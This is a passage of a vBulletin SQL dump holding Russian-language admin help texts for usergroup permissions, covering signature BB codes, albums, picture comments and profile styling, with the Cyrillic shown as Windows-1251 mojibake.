ñèìâîëîâ â ðàçíûõ îáîçðåâàòåëÿõ è ñòèëÿõ, ïîýòîìó âàì ñëåäóåò âûñòàâëÿòü åãî, ó÷èòûâàÿ âñ¸ ýòî.
\r\n
\r\nÌÿãêèé ïåðåíîñ ñòðîê ìîæåò áûòü èñïîëüçîâàí äëÿ ïåðåíîñà ñëîâ äëèííîé ñòðîêè íà íåñêîëüêî ñòðîê, ÷òîáû íå ðàñòÿãèâàòü îòîáðàæàåìîå ñîäåðæèìîå ôîðóìà. Êîëè÷åñòâî ñèìâîëîâ, êîòîðûå ïðåäïîëîæèòåëüíî êàê ðàç çàïîëíÿò îäíó ñòðîêó, óêàçûâàåòñÿ â ïàðàìåòðå "\"Ìàêñèìàëüíîå êîëè÷åñòâî ñèìâîëîâ â ñòðîêå ïîäïèñè\"". Åñëè ðàçìåð òåêñòà íå ñòàíäàðòíûé, òî èñïîëüçóåòñÿ ïðèáëèæ¸ííîå çíà÷åíèå, ÷òîáû ðàçìåð ñîâïàäàë ñ ðàçìåðîì ñòàíäàðòíîãî òåêñòà.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24683, -1, 'usergroup_add_edit_sigmaxlines_title', 'cphelptext', 'Ìàêñèìóì ñòðîê â ïîäïèñè', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24684, -1, 'usergroup_add_edit_canbbcode_text', 'cphelptext', 'Ãòî ãëîáàëüíûé ïåðåêëþ÷àòåëü ðàçðåøåíèÿ èñïîëüçîâàíèÿ BB êîäîâ â ïîäïèñÿõ ïîëüçîâàòåëåé ýòîé ãðóïïû. Èñïîëüçîâàíèå èíäèâèäóàëüíûõ BB êîäîâ êîíòðîëèðóåòñÿ äîïîëíèòåëüíûìè ïðàâàìè, óêàçàííûìè íèæå.
\r\n
\r\nÃîìíèòå, ÷òî íåñòàíäàðòíûå BB êîäû íå ìîãóò áûòü ïðîêîíòðîëèðîâàíû íèêàêèìè ïðàâàìè; âû ìîæåòå çàïðåòèòü èõ èñïîëüçîâàíèå, òîëüêî çàïðåòèâ âñå BB êîäû â ïîäïèñè.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24685, -1, 'usergroup_add_edit_canbbcode_title', 'cphelptext', 'Ãàçðåøèòü BB êîäû', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'), (24686, -1, 'usergroup_add_edit_canbbcodebasic_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè äàííîé ãðóïïû èñïîëüçîâàòü â ñâîèõ ïîäïèñÿõ BB êîäû [b] (ïîëóæèðíûé), [i] (êóðñèâ) è [u] (ïîä÷¸ðêíóòûé). Åñëè âû óêàæèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðàíèòü ïîäïèñü ñ íàëè÷èåì äàííûõ BB êîäîâ ïîëüçîâàòåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåíèå îá îøèáêå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24687, -1, 'usergroup_add_edit_canbbcodebasic_title', 'cphelptext', 'Ãàçðåøèòü îñíîâíûå BB êîäû', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'), (24688, -1, 'usergroup_add_edit_canbbcodecolor_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè äàííîé ãðóïïû èñïîëüçîâàòü â ñâîèõ ïîäïèñÿõ BB êîä [color] (öâåò òåêñòà). Åñëè âû óêàæèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðàíèòü ïîäïèñü ñ íàëè÷èåì äàííîãî BB êîäà ïîëüçîâàòåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåíèå îá îøèáêå. Âû íå ìîæåòå îãðàíè÷èòü öâåòà òåêñòà ëèøü îïðåäåë¸ííûìè öâåòàìè ñ ïîìîùüþ äàííîé îïöèè.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24689, -1, 'usergroup_add_edit_canbbcodecolor_title', 'cphelptext', 'Ãàçðåøèòü BB êîä öâåòà', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'), (24690, -1, 'usergroup_add_edit_canbbcodesize_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè äàííîé ãðóïïû èñïîëüçîâàòü â ñâîèõ ïîäïèñÿõ BB êîä [size] (ðàçìåð òåêñòà). Åñëè âû óêàæèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðàíèòü ïîäïèñü ñ íàëè÷èåì äàííîãî BB êîäà ïîëüçîâàòåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåíèå îá îøèáêå. Âû ìîæåòå îãðàíè÷èòü ìàêñèìàëüíûé ðàçìåð òåêñòà, èñïîëüçóÿ ïàðàìåòð íèæå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24691, -1, 'usergroup_add_edit_canbbcodesize_title', 'cphelptext', 'Ãàçðåøèòü BB êîä ðàçìåðà', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'), (24692, -1, 'usergroup_add_edit_sigmaxsizebbcode_text', 'cphelptext', 'Îïðåäåëÿåò ìàêñèìàëüíûé ðàçìåð øðèôòà, êîòîðûé ìîãóò èñïîëüçîâàòü ïîëüçîâàòåëè äàííîé ãðóïïû â ñâîåé ïîäïèñè. Åñëè îíè ïîïûòàþòñÿ èñïîëüçîâàòü áîëüøèé ðàçìåð, òî ïîÿâèòñÿ ñîîáùåíèå îá îøèáêå. Ñàìûé áîëüøîé ðàçìåð - 7; ðàçìåð ïî óìîë÷àíèþ - 2.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24693, -1, 'usergroup_add_edit_sigmaxsizebbcode_title', 'cphelptext', 'Ìàêñèìàëüíîå çíà÷åíèå äëÿ X â BB êîäå [SIZE=x]', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'), (24694, -1, 'usergroup_add_edit_canbbcodefont_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè äàííîé ãðóïïû èñïîëüçîâàòü â ñâîèõ ïîäïèñÿõ BB êîä [font] (òèï øðèôòà). Åñëè âû óêàæèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðàíèòü ïîäïèñü ñ íàëè÷èåì äàííîãî BB êîäà ïîëüçîâàòåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåíèå îá îøèáêå. Âû íå ìîæåòå îãðàíè÷èòü âûáîð òèïà øðèôòà â ïîäïèñè âûáîðêîé ëèøü èç îïðåäåë¸ííûõ øðèôòîâ ñ ïîìîùüþ ýòîé îïöèè.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24695, -1, 'usergroup_add_edit_canbbcodefont_title', 'cphelptext', 'Ãàçðåøèòü BB êîä øðèôòà', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'), (24696, -1, 'usergroup_add_edit_canbbcodealign_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè äàííîé ãðóïïû èñïîëüçîâàòü â ñâîèõ ïîäïèñÿõ BB êîäû [left] (ñëåâà), [center] (ïî öåíòðó) è [right] (ñïðàâà). Åñëè âû óêàæèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðàíèòü ïîäïèñü ñ íàëè÷èåì äàííûõ BB êîäîâ ïîëüçîâàòåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåíèå îá îøèáêå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24697, -1, 'usergroup_add_edit_canbbcodealign_title', 'cphelptext', 'Ãàçðåøèòü BB êîäû ðàñïîëîæåíèÿ', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'), (24698, -1, 'usergroup_add_edit_canbbcodelist_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè äàííîé ãðóïïû èñïîëüçîâàòü â ñâîèõ ïîäïèñÿõ BB êîä [list] (ñïèñîê). Åñëè âû óêàæèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðàíèòü ïîäïèñü ñ íàëè÷èåì äàííîãî BB êîäà ïîëüçîâàòåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåíèå îá îøèáêå. Âû íå ìîæåòå óïðàâëÿòü òèïàìè ñïèñêîâ ñ ïîìîùüþ ýòîé îïöèè.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24699, -1, 'usergroup_add_edit_canbbcodelist_title', 'cphelptext', 'Ãàçðåøèòü BB êîä ñïèñêà', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'), (24700, -1, 'usergroup_add_edit_canbbcodelink_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè äàííîé ãðóïïû èñïîëüçîâàòü â ñâîèõ ïîäïèñÿõ BB êîäû [email] è [url]. Åñëè âû óêàæèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðàíèòü ïîäïèñü ñ íàëè÷èåì äàííûõ BB êîäîâ ïîëüçîâàòåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåíèå îá îøèáêå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24701, -1, 'usergroup_add_edit_canbbcodelink_title', 'cphelptext', 'Ãàçðåøèòü BB êîäû ññûëîê', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'), (24702, -1, 'usergroup_add_edit_canbbcodecode_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè äàííîé ãðóïïû èñïîëüçîâàòü â ñâîèõ ïîäïèñÿõ BB êîä [code]. Åñëè âû óêàæèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðàíèòü ïîäïèñü ñ íàëè÷èåì äàííîãî BB êîäà ïîëüçîâàòåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåíèå îá îøèáêå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24703, -1, 'usergroup_add_edit_canbbcodecode_title', 'cphelptext', 'Ãàçðåøèòü BB êîä CODE', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'), (24704, -1, 'usergroup_add_edit_canbbcodephp_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè äàííîé ãðóïïû èñïîëüçîâàòü â ñâîèõ ïîäïèñÿõ BB êîä [php]. Åñëè âû óêàæèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðàíèòü ïîäïèñü ñ íàëè÷èåì äàííîãî BB êîäà ïîëüçîâàòåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåíèå îá îøèáêå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24705, -1, 'usergroup_add_edit_canbbcodephp_title', 'cphelptext', 'Ãàçðåøèòü BB êîä PHP', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'), (24706, -1, 'usergroup_add_edit_canbbcodehtml_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè äàííîé ãðóïïû èñïîëüçîâàòü â ñâîèõ ïîäïèñÿõ BB êîä [html]. Åñëè âû óêàæèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðàíèòü ïîäïèñü ñ íàëè÷èåì äàííîãî BB êîäà ïîëüçîâàòåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåíèå îá îøèáêå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24707, -1, 'usergroup_add_edit_canbbcodehtml_title', 'cphelptext', 'Ãàçðåøèòü BB êîä HTML', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'), (24708, -1, 'usergroup_add_edit_canbbcodequote_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè äàííîé ãðóïïû èñïîëüçîâàòü â ñâîèõ ïîäïèñÿõ BB êîä [quote]. Åñëè âû óêàæèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðàíèòü ïîäïèñü ñ íàëè÷èåì äàííîãî BB êîäà ïîëüçîâàòåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåíèå îá îøèáêå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24709, -1, 'usergroup_add_edit_canbbcodequote_title', 'cphelptext', 'Ãàçðåøèòü BB êîä öèòàòû', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'), (24710, -1, 'usergroup_add_edit_allowimg_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè äàííîé ãðóïïû èñïîëüçîâàòü â ñâîèõ ïîäïèñÿõ BB êîä [img]. Åñëè âû óêàæèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðàíèòü ïîäïèñü ñ íàëè÷èåì äàííîãî BB êîäà ó ïîëüçîâàòåëÿ ýòîé ãðóïïû âìåñòî èçîáðàæåíèÿ áóäåò ññûëêà, íèêàêîãî ñîîáùåíèÿ îá îøèáêå íå ïîÿâèòñÿ.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24711, -1, 'usergroup_add_edit_allowimg_title', 'cphelptext', 'Ãàçðåøèòü [IMG] êîä', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24712, -1, 'usergroup_add_edit_sigmaximages_text', 'cphelptext', 'Îïðåäåëÿåò ìàêñèìàëüíîå êîëè÷åñòâî èçîáðàæåíèé, êîòîðûå ïîëüçîâàòåëü ìîæåò âêëþ÷èòü â ñâîþ ïîäïèñü. Çäåñü ó÷èòûâàþòñÿ BB êîäû [img], [sigpic] (çàãðóæåííîå èçîáðàæåíèå), à òàêæå ñìàéëû. Óêàæèòå çäåñü 0, ÷òîáû ñíÿòü îãðàíè÷åíèå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24713, -1, 'usergroup_add_edit_sigmaximages_title', 'cphelptext', 'Ìàêñèìàëüíîå êîëè÷åñòâî èçîáðàæåíèé â ïîäïèñè', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24714, -1, 'usergroup_add_edit_allowsmilies_text', 'cphelptext', 'Îïðåäåëÿåò, ñëåäóåò ëè ðàñïîçíàâàòü êîäû ñìàéëîâ è âñòàâëÿòü âìåñòî íèõ ñìàéëû â ïîäïèñÿõ ïîëüçîâàòåëåé ýòîé ãðóïïû. Åñëè \"Ãåò\", òî êîäû ñìàéëîâ íå áóäóò êîíâåðòèðîâàòüñÿ â èçîáðàæåíèÿ.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24715, -1, 'usergroup_add_edit_allowsmilies_title', 'cphelptext', 'Ãàçðåøèòü ñìàéëû', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24716, -1, 'usergroup_add_edit_allowhtml_text', 'cphelptext', 'Îïðåäåëÿåò, ðàçðåø¸í ëè HTML êîä â ïîäïèñÿõ ïîëüçîâàòåëåé ýòîé ãðóïïû. Ãðè ðàçðåøåíèè HTML âû ïîäâåðãàåòå ôîðóì îïàñíîñòè! ÃÃ¥ âêëþ÷àéòå ýòó îïöèþ, åñëè âû íå ïîëíîñòüþ äîâåðÿåòå ïîëüçîâàòåëÿì èç ýòîé ãðóïïû.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24717, -1, 'usergroup_add_edit_allowhtml_title', 'cphelptext', 'Ãàçðåøèòü HTML', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24718, -1, 'usergroup_add_edit_candeleteownmessages_text', 'cphelptext', 'Îïðåäåëÿåò, ðàçðåøåíî ëè ïîëüçîâàòåëÿì ìÿãêî óäàëÿòü ñâîè ïóáëè÷íûå ñîîáùåíèÿ, îñòàâëåííûå êàê â ñâî¸ì, òàê è â ÷óæèõ ïðîôèëÿõ.

Îòíåñèòåñü âíèìàòåëüíî ê ïîõîæåìó ïðàâó - Ìîæåò óïðàâëÿòü ïóáëè÷íûìè ñîîáùåíèÿìè â ñâî¸ì ïðîôèëå, êîòîðîå ïðè ðàçðåøåíèè äàñò âîçìîæíîñòü óäàëÿòü ñâîè ïóáëè÷íûå ñîîáùåíèÿ, åñëè îíè áóäóò íàõîäèòüñÿ â ïðîôèëå åãî àâòîðà.', 'vbulletin', 'zCarot', 1204246399, '3.7.0 Beta 6'), (24719, -1, 'usergroup_add_edit_candeleteownmessages_title', 'cphelptext', 'Ìîæåò óäàëÿòü ñâîè ïóáëè÷íûå ñîîáùåíèÿ', 'vbulletin', 'zCarot', 1197373136, '3.7.0 Beta 1'), (24720, -1, 'usergroup_add_edit_canalbum_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò ñîçäàâàòü àëüáîìû è çàãðóæàòü â íèõ èçîáðàæåíèÿ

Òðåáóåòñÿ òàêæå ïðàâî \"Ìîæåò ïðîñìàòðèâàòü àëüáîìû\"', 'vbulletin', 'zCarot', 1199130982, '3.7.0 Beta 4'), (24721, -1, 'usergroup_add_edit_canalbum_title', 'cphelptext', 'Ìîæåò èìåòü àëüáîìû è çàãðóæàòü â íèõ èçîáðàæåíèÿ', 'vbulletin', 'zCarot', 1195733676, '3.7.0 Beta 1'), (24722, -1, 'usergroup_add_edit_canviewalbum_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò ïðîñìàòðèâàòü àëüáîìû', 'vbulletin', 'zCarot', 1195733981, '3.7.0 Beta 1'), (24723, -1, 'usergroup_add_edit_canviewalbum_title', 'cphelptext', 'Ìîæåò ïðîñìàòðèâàòü àëüáîìû', 'vbulletin', 'zCarot', 1195733981, '3.7.0 Beta 1'), (24724, -1, 'usergroup_add_edit_albumpicmaxwidth_text', 'cphelptext', 'Ìàêñèìàëüíî äîïóñòèìàÿ øèðèíà èçîáðàæåíèÿ. Ôîðóì ïîñòàðàåòñÿ óìåíüøèòü ðàçìåðû èçîáðàæåíèÿ äî óêàçàííûõ âàìè ïðåäåëîâ, åñëè âêëþ÷¸í ïàðàìåòð \"Ãèáëèîòåêà îáðàáîòêè èçîáðàæåíèé\".', 'vbulletin', 'zCarot', 1195734993, '3.7.0 Beta 1'), (24725, -1, 'usergroup_add_edit_albumpicmaxwidth_title', 'cphelptext', 'Ìàêñèìàëüíàÿ øèðèíà èçîáðàæåíèÿ àëüáîìîâ (â ïèêñåëÿõ)', 'vbulletin', 'zCarot', 1195734234, '3.7.0 Beta 1'), (24726, -1, 'usergroup_add_edit_albumpicmaxheight_text', 'cphelptext', 'Ìàêñèìàëüíî äîïóñòèìàÿ âûñîòà èçîáðàæåíèÿ. Ôîðóì ïîñòàðàåòñÿ óìåíüøèòü ðàçìåðû èçîáðàæåíèÿ äî óêàçàííûõ âàìè ïðåäåëîâ, åñëè âêëþ÷¸í ïàðàìåòð \"Ãèáëèîòåêà îáðàáîòêè èçîáðàæåíèé\".', 'vbulletin', 'zCarot', 1195735064, '3.7.0 Beta 1'), (24727, -1, 'usergroup_add_edit_albumpicmaxheight_title', 'cphelptext', 'Ìàêñèìàëüíàÿ âûñîòà èçîáðàæåíèÿ àëüáîìîâ (â ïèêñåëÿõ)', 'vbulletin', 'zCarot', 1195734301, '3.7.0 Beta 1'), (24728, -1, 'usergroup_add_edit_albummaxpics_text', 'cphelptext', 'Ìàêñèìàëüíî äîïóñòèìîå êîëè÷åñòâî èçîáðàæåíèé, êîòîðîå ìîæåò çàãðóçèòü ïîëüçîâàòåëü', 'vbulletin', 'zCarot', 1195735277, '3.7.0 Beta 1'), (24729, -1, 'usergroup_add_edit_albummaxpics_title', 'cphelptext', 'Ìàêñèìàëüíîå êîëè÷åñòâî èçîáðàæåíèé àëüáîìîâ', 'vbulletin', 'zCarot', 1195735277, '3.7.0 Beta 1'), (24730, -1, 'usergroup_add_edit_albumpicmaxsize_text', 'cphelptext', 'Ìàêñèìàëüíûé ðàçìåð ôàéëà èçîáðàæåíèÿ. Ôîðóì ïîñòàðàåòñÿ óìåíüøèòü ðàçìåðû èçîáðàæåíèÿ äî óêàçàííûõ âàìè ïðåäåëîâ, åñëè âêëþ÷¸í ïàðàìåòð \"Ãèáëèîòåêà îáðàáîòêè èçîáðàæåíèé\".', 'vbulletin', 'zCarot', 1195735300, '3.7.0 Beta 1'), (24731, -1, 'usergroup_add_edit_albumpicmaxsize_title', 'cphelptext', 'Ìàêñèìàëüíûé ðàçìåð ôàéëà èçîáðàæåíèÿ àëüáîìîâ (â áàéòàõ)', 'vbulletin', 'zCarot', 1195734373, '3.7.0 Beta 1'), (24732, -1, 'usergroup_add_edit_albummaxsize_text', 'cphelptext', 'Ìàêñèìàëüíûé îáùèé ðàçìåð ôàéëîâ èçîáðàæåíèé, çàãðóæåííûõ ïîëüçîâàòåëåì', 'vbulletin', 'zCarot', 1195735356, '3.7.0 Beta 1'), (24733, -1, 'usergroup_add_edit_albummaxsize_title', 'cphelptext', 'Îáùèé ðàçìåð ôàéëîâ èçîáðàæåíèé (â áàéòàõ)', 'vbulletin', 'zCarot', 1195735356, '3.7.0 Beta 1'), (24734, -1, 'usergroup_add_edit_canpiccomment_text', 'cphelptext', 'Åñëè ðàçðåøåíî, òî ïîëüçîâàòåëè ýòîé ãðóïïû ñìîãóò êîììåíòèðîâàòü èçîáðàæåíèÿ, çàãðóæåííûå â àëüáîìû äðóãèõ ïîëüçîâàòåëåé.
\r\n
\r\n×òîáû êîììåíòèðîâàòü èçîáðàæåíèå, ïîëüçîâàòåëü äîëæåí èìåòü ïðàâà íà ïðîñìîòð äàííîãî èçîáðàæåíèÿ. Åñëè íåêèé ïîëüçîâàòåëü æåëàåò îãðàíè÷èòü êîììåíòèðîâàíèå ñâîèõ èçîáðàæåíèé, òî îí(à) ìîæåò ñäåëàòü ñâîé àëüáîì ëè÷íûì.', 'vbulletin', 'zCarot', 1205426424, '3.7.0 Release Candidate 1'), (24735, -1, 'usergroup_add_edit_canpiccomment_title', 'cphelptext', 'Ìîæåò êîììåíòèðîâàòü èçîáðàæåíèÿ', 'vbulletin', 'zCarot', 1205426424, '3.7.0 Release Candidate 1'), (24736, -1, 'usergroup_add_edit_caneditownpiccomment_text', 'cphelptext', 'Åñëè ðàçðåøåíî, òî ïîëüçîâàòåëè ñìîãóò ðåäàêòèðîâàòü ñâîè êîììåíòàðèè ïîñëå îòïðàâêè.', 'vbulletin', 'zCarot', 1205426470, '3.7.0 Release Candidate 1'), (24737, -1, 'usergroup_add_edit_caneditownpiccomment_title', 'cphelptext', 'Ìîæåò ðåäàêòèðîâàòü ñâîè êîììåíòàðèè ê èçîáðàæåíèÿì', 'vbulletin', 'zCarot', 1205426470, '3.7.0 Release Candidate 1'), (24738, -1, 'usergroup_add_edit_candeleteownpiccomment_text', 'cphelptext', 'Åñëè ðàçðåøåíî, òî ïîëüçîâàòåëè äàííîé ãðóïïû ñìîãóò ìÿãêî óäàëÿòü ñâîè êîììåíòàðèè. Ãà ìåñòå óäàë¸ííîãî êîììåíòàðèÿ áóäåò óâåäîìëåíèå îá óäàëåíèè.
\r\n
\r\nÃòî óâåäîìëåíèå, êàê è îðèãèíàë ñîîáùåíèÿ, áóäåò îòîáðàæàòüñÿ ìîäåðàòîðàì. Àâòîð èçîáðàæåíèÿ ñìîæåò óâèäåòü óâåäîìëåíèå, íî íå ñìîæåò ïðî÷åñòü òåêñò óäàë¸ííîãî êîììåíòàðèÿ.', 'vbulletin', 'zCarot', 1205426749, '3.7.0 Release Candidate 1'), (24739, -1, 'usergroup_add_edit_candeleteownpiccomment_title', 'cphelptext', 'Ìîæåò óäàëÿòü ñâîè êîììåíòàðèè ê èçîáðàæåíèÿì', 'vbulletin', 'zCarot', 1205426553, '3.7.0 Release Candidate 1'), (24740, -1, 'usergroup_add_edit_canmanagepiccomment_text', 'cphelptext', 'Åñëè ðàçðåøåíî, òî ïîëüçîâàòåëè ñìîãóò óïðàâëÿòü êîììåíòàðèÿìè ê ñâîèì èçîáðàæåíèÿì, à èìåííî:\r\n
    \r\n
  • Çàïðåùàòü êîììåíòàðèè
  • \r\n
  • Îäîáðÿòü êîììåíòàðèè
  • \r\n
  • Ìÿãêî óäàëÿòü êîììåíòàðèè
  • \r\n
\r\nÃòî ðàçðåøåíèå ðàñïðîñòðàíÿåòñÿ è íà ñîáñòâåííûå êîììåíòàðèè ïîëüçîâàòåëÿ ê ñâîèì èçîáðàæåíèÿì. Ãòî äàñò âîçìîæíîñòü ïîëüçîâàòåëþ óäàëÿòü ñâîè êîììåíòàðèè ê ñâîèì æå èçîáðàæåíèÿì, íå èìåÿ ïðàâ íà óäàëåíèå ñâîèõ êîììåíòàðèåâ ê èçîáðàæåíèÿì.', 'vbulletin', 'zCarot', 1205426830, '3.7.0 Release Candidate 1'), (24741, -1, 'usergroup_add_edit_canmanagepiccomment_title', 'cphelptext', 'Ìîæåò óïðàâëÿòü êîììåíòàðèÿìè ê ñâîèì èçîáðàæåíèÿì', 'vbulletin', 'zCarot', 1205426687, '3.7.0 Release Candidate 1'), (24742, -1, 'usergroup_add_edit_caneditfontfamily_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò ðåäàêòèðîâàòü òèï øðèôòà, îòîáðàæàåìîãî â ñâî¸ì ïðîôèëå.', 'vbulletin', 'zCarot', 1195737587, '3.7.0 Beta 1'), (24743, -1, 'usergroup_add_edit_caneditfontfamily_title', 'cphelptext', 'Ìîæåò ðåäàêòèðîâàòü òèï øðèôòîâ', 'vbulletin', 'zCarot', 1195737587, '3.7.0 Beta 1'), (24744, -1, 'usergroup_add_edit_caneditfontsize_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò ðåäàêòèðîâàòü ðàçìåð øðèôòà, îòîáðàæàåìîãî â ñâî¸ì ïðîôèëå.', 'vbulletin', 'zCarot', 1198868099, '3.7.0 Beta 4'), (24745, -1, 'usergroup_add_edit_caneditfontsize_title', 'cphelptext', 'Ìîæåò ðåäàêòèðîâàòü ðàçìåð øðèôòîâ', 'vbulletin', 'zCarot', 1195737658, '3.7.0 Beta 1'), (24746, -1, 'usergroup_add_edit_caneditcolors_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò ðåäàêòèðîâàòü öâåòà, îòîáðàæàåìûå â ñâî¸ì ïðîôèëå.', 'vbulletin', 'zCarot', 1195738004, '3.7.0 Beta 1'), (24747, -1, 'usergroup_add_edit_caneditcolors_title', 'cphelptext', 'Ìîæåò ðåäàêòèðîâàòü öâåòà', 'vbulletin', 'zCarot', 1195738004, '3.7.0 Beta 1'), (24748, -1, 'usergroup_add_edit_caneditbgimage_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò ðåäàêòèðîâàòü ôîíîâîå èçîáðàæåíèå ñâîåãî ïðîôèëÿ.

ÃÃŽÃŒÃÈÒÅ Äëÿ ðàáîòû äàííîãî ïàðàìåòðà òðåáóþòñÿ ïðàâà íà ñîçäàíèå àëüáîìîâ', 'vbulletin', 'zCarot', 1195738292, '3.7.0 Beta 1'), (24749, -1, 'usergroup_add_edit_caneditbgimage_title', 'cphelptext', 'Ìîæåò ðåäàêòèðîâàòü ôîíîâûå èçîáðàæåíèÿ', 'vbulletin', 'zCarot', 1195738292, '3.7.0 Beta 1'), (24750, -1, 'usergroup_add_edit_caneditborders_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò ðåäàêòèðîâàòü ñòèëü, øèðèíó è öâåò ãðàíèö, îòîáðàæàåìûõ â ñâî¸ì ïðîôèëå.', 'vbulletin', 'zCarot', 1195738675, '3.7.0 Beta 1'), (24751, -1, 'usergroup_add_edit_caneditborders_title', 'cphelptext', 'Ìîæåò ðåäàêòèðîâàòü ãðàíèöû', 'vbulletin', 'zCarot', 1195738675, '3.7.0 Beta 1'), (24752, -1, 'usergroup_add_edit_cancreategroups_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò ñîçäàâàòü íîâûå ñîöèàëüíûå ãðóïïû (Äëÿ ðàáîòû äàííîãî ïàðàìåòðà òðåáóþòñÿ ïðàâà \"Ìîæåò ïðîñìàòðèâàòü ñîöèàëüíûå ãðóïïû\" è \"Ìîæåò âñòóïàòü â ñîöèàëüíûå ãðóïïû\").', 'vbulletin', 'zCarot', 1195740476, '3.7.0 Beta 1'), (24753, -1, 'usergroup_add_edit_cancreategroups_title', 'cphelptext', 'Ìîæåò ñîçäàâàòü ñîöèàëüíûå ãðóïïû', 'vbulletin', 'zCarot', 1195740476, '3.7.0 Beta 1'), (24754, -1, 'usergroup_add_edit_caneditowngroups_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò ðåäàêòèðîâàòü äàííûå ñâîèõ ñîöèàëüíûõ ãðóïï.
\r\n
